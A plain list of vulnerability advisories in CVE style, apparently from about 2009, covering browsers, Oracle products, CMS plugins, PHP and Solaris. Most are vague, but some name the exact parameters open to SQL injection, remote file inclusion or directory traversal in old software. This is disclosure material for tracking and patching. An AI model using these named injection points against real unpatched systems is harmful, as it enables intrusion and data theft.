Unspecified vulnerability in Wikipedia Toolbar extension before 0.5.9.2 for Firefox allows user-assisted remote attackers to execute arbitrary JavaScript with Chrome privileges via vectors involving unspecified Toolbar buttons and the eval function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in Robo-FTP 3.6.17, and possibly other versions, allows remote FTP servers to cause a denial of service and possibly execute arbitrary code via unspecified FTP server responses.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in assets/plugins/mp3_id/mp3_id.php in PHP Traverser 0.8.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[BASE] parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the timeout mechanism in sshd in Sun Solaris 10, and OpenSolaris snv_99 through snv_123, allows remote attackers to cause a denial of service (daemon outage) via unknown vectors that trigger a "dangling sshd authentication thread."
Unspecified vulnerability in Opera before 10.10 has unknown impact and attack vectors, related to a "moderately severe issue."
SQL injection vulnerability in GForge 4.5.14, 4.7.3, and possibly other versions allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Multiple directory traversal vulnerabilities in Home FTP Server 1.10.1.139 allow remote authenticated users to (1) create arbitrary directories via directory traversal sequences in an MKD command or (2) create files with any contents in arbitrary directories via directory traversal sequences in a file upload request.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in get_file.php in phpMyBackupPro 2.1 allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in PHD Help Desk 1.43 allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO to area.php; the (2) pagina, (3) sentido, (4) q_registros, and (5) orden parameters to area.php; (6) the q_registros parameter to solic_display.php; (7) the PATH_INFO to area_list.php; (8) the q_registros parameter to area_list.php; (9) the PATH_INFO to atributo.php; the (10) pagina, (11) q_registros, and (12) orden parameters to atributo_list.php; (13) an arbitrary parameter name beginning with "sentido" to atributo_list.php; and (14) the PATH_INFO to caso_insert.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Web Services module 6.x for Drupal does not perform the expected access control, which allows remote attackers to make unspecified use of an API via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in NCH Software Axon Virtual PBX 2.10 and 2.11 allow remote attackers to inject arbitrary web script or HTML via the (1) onok or (2) oncancel parameter to the logon program.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla Firefox 3.5.x before 3.5.6, SeaMonkey before 2.0.1, and Thunderbird allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox before 3.0.16, SeaMonkey before 2.0.1, and Thunderbird allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.6, SeaMonkey before 2.0.1, and Thunderbird allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, SeaMonkey before 2.0.1, and Thunderbird allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in XOOPS before 2.4.0 Final have unknown impact and attack vectors.
Unspecified vulnerability in the Flash Player ActiveX control in Adobe Flash Player before 10.0.42.34 and Adobe AIR before 1.5.3 on Windows allows remote attackers to obtain the names of local files via unknown vectors.  NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4820.
Unspecified vulnerability in the Front-End Editor in the com_content component in Joomla! before 1.5.15 allows remote authenticated users, with Author privileges, to replace the articles of an arbitrary user via unknown vectors.
Unspecified vulnerability in Guest Additions in Sun xVM VirtualBox 1.6.x and 2.0.x before 2.0.12, 2.1.x, and 2.2.x, and Sun VirtualBox before 3.0.10, allows guest OS users to cause a denial of service (memory consumption) on the guest OS via unknown vectors.
Multiple unspecified vulnerabilities in the Advanced Management Module firmware before 2.50G for the IBM BladeCenter T 8720-2xx and 8730-2xx have unknown impact and attack vectors.
Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in jspui/index.jsp in ManageEngine Netflow Analyzer 7.5 build 7500 allow remote attackers to inject arbitrary web script or HTML via the (1) view and (2) section parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the Windows Pluggable Look and Feel (PL&amp;F) feature in the Swing implementation in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and remote attack vectors, related to "information leaks in mutable variables," aka Bug Id 6657138.
Multiple unspecified vulnerabilities in the Swing implementation in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and remote attack vectors, related to "information leaks in mutable variables," aka Bug Id 6657026.
Multiple unspecified vulnerabilities in the (1) X11 and (2) Win32GraphicsDevice subsystems in Sun Java SE 5.0 before Update 22 and 6 before Update 17, and OpenJDK, have unknown impact and attack vectors, related to failure to clone arrays that are returned by the getConfigurations function, aka Bug Id 6822057.
Multiple unspecified vulnerabilities in the (1) UNIX and (2) Linux backup-archive clients, and the (3) OS/400 API client, in IBM Tivoli Storage Manager (TSM) 5.3 before 5.3.6.6, 5.4 before 5.4.2, and 5.5 before 5.5.1, when the MAILPROG option is enabled, allow attackers to read, modify, or delete arbitrary files via unknown vectors.
Unspecified vulnerability in the XML component in IBM Runtimes for Java Technology 5.0.0 before SR10 has unknown impact and attack vectors, related to the "updated version of XML4J 4.4.17."
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability on the HP Color LaserJet M3530 Multifunction Printer with firmware 05.058.4 and the Color LaserJet CP3525 Printer with firmware 53.021.2 allows remote attackers to obtain "access to data" or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Discovery &amp; Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.60 on Windows allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the session handling feature in freeCap CAPTCHA (sr_freecap) extension 1.2.0 and earlier for TYPO3 has unknown impact and attack vectors.
PHP remote file inclusion vulnerability in doc/releasenote.php in the BookLibrary (com_booklibrary) component 1.0 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter, a different vector than CVE-2009-2637.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in OpenDocMan 1.2.5 allows remote attackers to execute arbitrary SQL commands via the frmpass (aka Password) parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Adobe Flash Player before 10.0.42.34 and Adobe AIR before 1.5.3 allow attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory consumption) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in Adobe Flash Media Server (FMS) before 3.5.3 allows attackers to cause a denial of service (resource exhaustion) via unknown vectors.
Heap-based buffer overflow in FormMax (formerly AcroForm) evaluation 3.5 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted FormMax import (.aim) file.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site request forgery (CSRF) vulnerabilities in Simplenews Statistics 6.x before 6.x-2.0, a module for Drupal, allow remote attackers to hijack the authentication of arbitrary users via unknown vectors.
Unspecified vulnerability in Userpoints 6.x before 6.x-1.1, a module for Drupal, allows remote authenticated users with "View own userpoints" permissions to read the userpoint data of arbitrary users via unknown attack vectors.
Unspecified vulnerability in the OpenSSO component in Oracle OpenSSO Enterprise 8.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Access Manager / OpenSSO component in Oracle OpenSSO Enterprise 7.1, 7, 2005Q4, and 8.0 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in Oracle OpenSSO Enterprise 8.0 allows remote attackers to affect integrity via unknown vectors.
Multiple unspecified vulnerabilities on the Rockwell Automation AB Micrologix 1100 and 1400 controllers allow remote attackers to obtain privileged access or cause a denial of service (halt) via unknown vectors.
Stack-based buffer overflow in the Meta Content Optimizer in Konae Technologies Alleycode HTML Editor 2.21 allows user-assisted remote attackers to execute arbitrary code via a long value in a (1) description or (2) keyword META tag.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the VBoxNetAdpCtl configuration tool in Sun VirtualBox 3.0.x before 3.0.8 on Solaris x86, Linux, and Mac OS X allows local users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in Shared Sign-On 5.x and 6.x, a module for Drupal, allows remote attackers to hijack the authentication of arbitrary users via unknown vectors.
Unspecified vulnerability in Boost before 6.x-1.03, a module for Drupal, allows remote attackers to create new webroot directories via unknown attack vectors.
Cross-site scripting (XSS) vulnerability in emaullinks.php in YABSoft Mega File Hosting Script (aka MFH or MFHS) 1.2 allows remote attackers to inject arbitrary web script or HTML via the moudi parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in ViewVC 1.0 before 1.0.9 and 1.1 before 1.1.2 has unknown impact and remote attack vectors related to "printing illegal parameter names and values."
Buffer overflow in DHTRoutingTableDeserializer.cc in aria2 0.15.3, 1.2.0, and other versions allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in OpenOffice.org (OOo) has unknown impact and client-side attack vector, as demonstrated by a certain module in VulnDisco Pack Professional 8.8, aka "Client-side exploit." NOTE: as of 20091005, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
** DISPUTED ** main/streams/plain_wrapper.c in PHP 5.3.x before 5.3.1 does not recognize the safe_mode_include_dir directive, which allows context-dependent attackers to have an unknown impact by triggering the failure of PHP scripts that perform include or require operations, as demonstrated by a script that attempts to perform a require_once on a file in a standard library directory. NOTE: a reliable third party reports that this is not a vulnerability, because it results in a more restrictive security policy.
Cross-site scripting (XSS) vulnerability in listads.php in YourFreeWorld Ultra Classifieds Pro allows remote attackers to inject arbitrary web script or HTML via the cn parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in thumb.php in Clear Content 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in ashWsFtr.dll in avast! Home and Professional for Windows before 4.8.1356 has unknown impact and local attack vectors.
A certain interface in the iCRM Basic (com_icrmbasic) component 1.4.2.31 for Joomla! does not require administrative authentication, which has unspecified impact and remote attack vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in the iCRM Basic (com_icrmbasic) component 1.4.2.31 for Joomla! allows remote attackers to execute arbitrary SQL commands via the p3 parameter to index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Common Desktop Environment (CDE) in Sun Solaris 10, when Trusted Extensions is enabled, allow local users to execute arbitrary commands or bypass the Mandatory Access Control (MAC) policy via unknown vectors, related to a menu typo and the Style Manager.
Cross-site scripting (XSS) vulnerability in an unspecified method in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in Adobe Acrobat 9.x before 9.2 allows attackers to bypass intended file-extension restrictions via unknown vectors.
Google Chrome, possibly 3.0.195.21 and earlier, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in clsetup in the configuration utility in Sun Solaris Cluster 3.2 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in xscreensaver in Sun Solaris 10, and OpenSolaris before snv_112, when Xorg or Xnewt is used and RandR is enabled, allows physically proximate attackers to read a locked screen via unknown vectors related to XRandR resize events.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle OLAP component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2008-3976 and CVE-2009-3413.
Unspecified vulnerability in the Oracle Spatial component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2008-3976 and CVE-2009-3414.
Unspecified vulnerability in the Unzip component in Oracle Database 9.2.0.8, 9.2.0.8DV, and 10.1.0.5; and Oracle Application Server 10.1.2.3; allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Data Pump component in Oracle Database 11.1.0.7, 10.2.0.3, 10.2.0.4, 10.1.0.5, 9.2.0.8, and 9.2.0.8DV allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the RDBMS component in Oracle Database 11.1.0.7, 10.2.0.3, 10.2.0.4, 10.1.0.5, 9.2.0.8, and 9.2.0.8DV allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the PeopleSoft Enterprise HCM (TAM) component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 9.0 Bundle 10 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2009-0974 and CVE-2009-0983.
Unspecified vulnerability in the JD Edwards Tools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.98.2.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the JD Edwards Tools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.98.1.4 allows remote authenticated users to affect integrity and availability via unknown vectors.
Unspecified vulnerability in the PeopleSoft PeopleTools &amp; Enterprise Portal component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.23 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the JRockit component in BEA Product Suite R27.6.4: JRE/JDK, 1.4.2, 5, and, and 6 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.  NOTE: this issue subsumes CVE-2009-2670, CVE-2009-2671, CVE-2009-2672, CVE-2009-2673, CVE-2009-2674, CVE-2009-2675, and CVE-2009-2676.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.1 allows local users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Oracle Advanced Benefits component in Oracle E-Business Suite 11.5.10.2, 12.0.6, and 12.1.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 12.0.6 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the AutoVue component in Oracle E-Business Suite 19.3.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Agile Engineering Data Management (EDM) component in Oracle E-Business Suite 6.1.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Multiple unspecified vulnerabilities in the (1) iscsiadm and (2) iscsitadm programs in Sun Solaris 10, and OpenSolaris snv_28 through snv_109, allow local users with certain RBAC execution profiles to gain privileges via unknown vectors related to the libima library.
Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla Firefox 3.5.x before 3.5.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.5.x before 3.5.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in libvorbis, as used in Mozilla Firefox 3.5.x before 3.5.4, allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.  NOTE: this might overlap CVE-2009-2663.
Multiple unspecified vulnerabilities in liboggz before cf5feeaab69b05e24, as used in Mozilla Firefox 3.5.x before 3.5.4, allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.
Multiple cross-site scripting (XSS) vulnerabilities in An image gallery 1.0 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) index.php and (2) main.php, and the (3) show parameter to main.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the Rest API module for Drupal have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the Node2Node module for Drupal have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the quota_by_role (Quota by role) module for Drupal have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the Node Browser module for Drupal have unknown impact and attack vectors.
Multiple unspecified vulnerabilities in the Subdomain Manager module for Drupal have unknown impact and attack vectors.
Unspecified vulnerability in SAP Crystal Reports Server 2008 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11.  NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Heap-based buffer overflow in SAP Crystal Reports Server 2008 has unknown impact and attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11.  NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in SAP Crystal Reports Server 2008 on Windows XP allows attackers to cause a denial of service (infinite loop) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.3 through 8.11.  NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in FreeSSHD 1.2.4 allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in McAfee Email and Web Security Appliance 5.1 VMtrial allows remote attackers to read arbitrary files via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.9 through 8.11.  NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in the imagecolortransparent function in PHP before 5.2.11 has unknown impact and attack vectors related to an incorrect "sanity check for the color index."
Unspecified vulnerability in PHP before 5.2.11, and 5.3.x before 5.3.1, has unknown impact and attack vectors related to "missing sanity checks around exif processing."
The php_openssl_apply_verification_policy function in PHP before 5.2.11 does not properly perform certificate validation, which has unknown impact and attack vectors, probably related to an ability to spoof certificates.
The getSVGDocument method in Google Chrome before 3.0.195.21 omits an unspecified "access check," which allows remote web servers to bypass the Same Origin Policy and conduct cross-site scripting attacks via unknown vectors, related to a user's visit to a different web server that hosts an SVG document.
Multiple SQL injection vulnerabilities in RASH Quote Management System (RQMS) 1.2.2 allow remote attackers to execute arbitrary SQL commands via (1) the search parameter in a search action, (2) the quote parameter in a quote addition, or (3) a User_Name cookie in unspecified administrative actions.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the TLS dissector in Wireshark 1.2.0 and 1.2.1, when running on Windows, allows remote attackers to cause a denial of service (application crash) via unknown vectors related to TLS 1.2 conversations.
Unspecified vulnerability in packet.c in the GSM A RR dissector in Wireshark 1.2.0 and 1.2.1 allows remote attackers to cause a denial of service (application crash) via unknown vectors related to "an uninitialized dissector handle," which triggers an assertion failure.
Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework 3.2 before 3.2.5 and 3.3 before 3.3.5; Groupware 1.1 before 1.1.6 and 1.2 before 1.2.4; and Groupware Webmail Edition 1.1 before 1.1.6 and 1.2 before 1.2.4; allow remote attackers to inject arbitrary web script or HTML via the (1) crafted number preferences that are not properly handled in the preference system (services/prefs.php), as demonstrated by the sidebar_width parameter; or (2) crafted unknown MIME "text parts" that are not properly handled in the MIME viewer library (config/mime_drivers.php).
Multiple unspecified vulnerabilities in Symantec Altiris Deployment Solution 6.9 might allow remote attackers to execute arbitrary code via unknown client-side attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 7.17, as identified by (1) "Symantec Altiris Deployment Solution 6.9 exploit, (2) "Symantec Altiris Deployment Solution 6.9 exploit (II)," and (3) "Symantec Altiris Deployment Solution 6.9 exploit (III)." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in mm.exe in Symantec Altiris Deployment Solution 6.9 allows remote attackers to cause a denial of service via unknown attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 7.18, "Symantec Altiris Deployment Solution 6.9 DoS." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in Kaspersky Online Scanner 7.0 has unknown impact and attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.8, (1) "Kaspersky Online Antivirus Scanner 7.0 exploit (Linux)" and (2) "Kaspersky Online Antivirus Scanner 7.0 exploit (Windows)." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Buffer overflow in the ActiveX control in Novell iPrint Client 4.38 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.1, "Novell iPrint Client 4.38 ActiveX exploit." NOTE: as of 20090909, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in Hitachi Groupmax Groupware Server 07-00 through 07-50-/A, Groupmax Server Set 03-00 through 06-52, Groupware Server Set 03-00 through 06-52, and Scheduler Server Set 03-00 through 06-52 has unknown impact and attack vectors related to invalid access rights.
Multiple unspecified vulnerabilities in Hitachi JP1/File Transmission Server/FTP before 09-00 allow remote attackers to execute arbitrary code via unknown attack vectors.
IBM WebSphere MQ 6.x through 6.0.2.7, 7.0.0.0, 7.0.0.1, 7.0.0.2, and 7.0.1.0, when read ahead or asynchronous message consumption is enabled, allows attackers to have an unspecified impact via unknown vectors, related to a "memory overwrite" issue.
Unspecified vulnerability in the rriDecompress function in IBM WebSphere MQ 7.0.0.0, 7.0.0.1, and 7.0.0.2 allows remote attackers to cause a denial of service via unknown vectors.
admin/files.php in simplePHPWeb 0.2 does not require authentication, which allows remote attackers to perform unspecified administrative actions via unknown vectors.  NOTE: some of these details are obtained from third party information.
Cross-site scripting (XSS) vulnerability in search_advance.php in ArticleFriend Script allows remote attackers to inject arbitrary web script or HTML via the SearchWd parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Symantec Norton AntiVirus 2005 through 2008; Norton Internet Security 2005 through 2008; AntiVirus Corporate Edition 9.0 before MR7, 10.0, 10.1 before MR8, and 10.2 before MR3; and Client Security 2.0 before MR7, 3.0, and 3.1 before MR8; when Internet Email Scanning is installed and enabled, allows remote attackers to cause a denial of service (CPU consumption and persistent connection loss) via unknown attack vectors.
Unspecified vulnerability in HP OpenView Operations Manager 8.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11, a different vulnerability than CVE-2007-3872.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in the Portal in HP Operations Dashboard 2.1 on Windows Server 2003 SP2 allows remote attackers to have an unknown impact, related to a "Remote exploit," as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Multiple unspecified vulnerabilities in HP Performance Insight 5.3 on Windows allow attackers to obtain sensitive information via unknown vectors, as demonstrated by certain modules in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Multiple unspecified vulnerabilities in HP Performance Insight 5.3 allow remote attackers to have an unknown impact, related to (1) a "Remote exploit" on Windows platforms, and (2) a "Remote preauthentication exploit" on the Windows Server 2003 SP2 platform, as demonstrated by certain modules in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability on the ASUS WL-500W wireless router has unknown impact and remote attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Buffer overflow on the ASUS WL-500W wireless router has unknown impact and remote attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability on the ASUS WL-330gE has unknown impact and remote attack vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in IBM Tivoli Directory Server (TDS) 6.0 on Linux allows remote attackers to cause a denial of service via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Heap-based buffer overflow in ibmdiradm in IBM Tivoli Directory Server (TDS) 6.0 on Linux allows remote attackers to have an unspecified impact via unknown vectors that trigger heap corruption, as demonstrated by a certain module in VulnDisco Pack Professional 8.11. NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
Unspecified vulnerability in nserver.exe in the server in IBM Lotus Domino 8.0 on Windows Server 2003 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.  NOTE: as of 20090903, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
SQL injection vulnerability in wcategory.php in Snow Hall Silurus System 1.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in index.php in Uiga Church Portal allows remote attackers to execute arbitrary SQL commands via the month parameter in a calendar action.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla Firefox before 3.0.14 and 3.5.x before 3.5.2, Thunderbird before 2.0.0.24, and SeaMonkey before 1.1.19 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to use of mutable strings in the js_StringReplaceHelper function in js/src/jsstr.cpp, and unknown vectors.
Unspecified vulnerability in the JavaScript engine in Mozilla Firefox before 3.0.14 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the JavaScript engine in Mozilla Firefox 3.5.x before 3.5.3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
